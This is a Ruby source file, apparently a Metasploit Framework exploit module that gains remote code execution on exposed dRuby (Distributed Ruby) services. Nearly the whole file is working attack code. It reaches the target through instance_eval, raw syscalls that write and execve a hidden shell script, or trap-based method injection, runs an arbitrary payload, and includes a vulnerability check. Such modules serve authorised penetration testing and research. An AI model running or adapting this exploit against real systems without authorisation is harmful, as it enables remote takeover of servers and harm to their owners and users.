metasploit-gs/modules/exploits/linux/misc/drb_remote_codeexec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'drb/drb'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Distributed Ruby Remote Code Execution',
        'Description' => %q{
          This module exploits remote code execution vulnerabilities in dRuby.
        },
        'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], # (Phenoelit)
        'License' => MSF_LICENSE,
        'References' =>
          [
            [ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
            [ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],
            [ 'URL', 'http://bugkraut.de/posts/tainting' ]
          ],
        'Privileged' => false,
        'Payload' =>
          {
            'DisableNops' => true,
            'Space' => 32768
          },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [
          ['Automatic', { method: 'auto' }],
          ['Trap', { method: 'trap' }],
          ['Eval', { method: 'instance_eval' }],
          ['Syscall', { method: 'syscall' }],
        ],
        'DisclosureDate' => '2011-03-23',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        Opt::RHOST,
        Opt::RPORT(8787)
      ]
    )
  end

  def method_trap(p)
    p.send(:trap, 23,
           :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
    # Decide if this is running on an x86 or x64 target, using the kill(2) syscall
    begin
      pid = p.send(:syscall, 20)
      p.send(:syscall, 37, pid, 23)
    rescue Errno::EBADF
      # 64 bit system
      pid = p.send(:syscall, 39)
      p.send(:syscall, 62, pid, 23)
    end
    p.send(:my_eval, payload.encoded)
  end

  def method_instance_eval(p)
    p.send(:instance_eval, "Kernel.fork { `#{payload.encoded}` }")
  end

  def method_syscall(p)
    filename = '.' + Rex::Text.rand_text_alphanumeric(16)

    begin
      # Decide if this is running on an x86 or x64 target.
      # This syscall number is getpid on x86, which will succeed,
      # or writev on x64, which will fail due to missing args.
      j = p.send(:syscall, 20)
      # syscall open
      i = p.send(:syscall, 8, filename, 0o700)
      # syscall write
      p.send(:syscall, 4, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11)
      # syscall close
      p.send(:syscall, 6, i)
      # syscall fork
      p.send(:syscall, 2)
      sleep 2
      # syscall execve
      p.send(:syscall, 11, filename, 0, 0)
      print_status("attempting x86 execve of #{filename}")

    # likely x64
    rescue Errno::EBADF
      # syscall creat
      i = p.send(:syscall, 85, filename, 0o700)
      # syscall write
      p.send(:syscall, 1, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11)
      # syscall close
      p.send(:syscall, 3, i)
      # syscall fork
      p.send(:syscall, 57)
      sleep 2
      # syscall execve
      p.send(:syscall, 59, filename, 0, 0)
      print_status("attempting x64 execve of #{filename}")
    end

    register_file_for_cleanup(filename) if filename
  end

  def rhost
    datastore['RHOST']
  end

  def check
    begin
      pid = p.send(:syscall, 20)
    rescue Errno::EBADF
      # 64 bit system
      pid = p.send(:syscall, 39)
    rescue SecurityError, DRb::DRbConnError, NoMethodError
      return CheckCode::Safe
    end
    vprint_status("Service detected, syscall responded from pid #{pid}")

    val1 = rand(0xffff)
    val2 = rand(0xffff)
    begin
      result = p.send(:instance_eval, "#{val1} + #{val2}")
    rescue SecurityError, DRb::DRbConnError, NoMethodError
    end

    return CheckCode::Vulnerable if result == val1 + val2

    CheckCode::Detected
  end

  def exploit
    serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"

    # DRb.start_service  # this is unnecessary
    p = DRbObject.new_with_uri(serveruri)
    class << p
      undef :send
    end

    if target[:method] == 'auto'
      methods = %w[instance_eval syscall trap]
    else
      methods = [target[:method]]
    end

    methods.each do |method|
      begin
        print_status("Trying to exploit #{method} method")
        send('method_' + method, p)
        handler(nil)
        break
      rescue SecurityError, DRb::DRbConnError, NoMethodError
        print_warning("Target is not vulnerable to #{method} method")
      end
    end

  end
end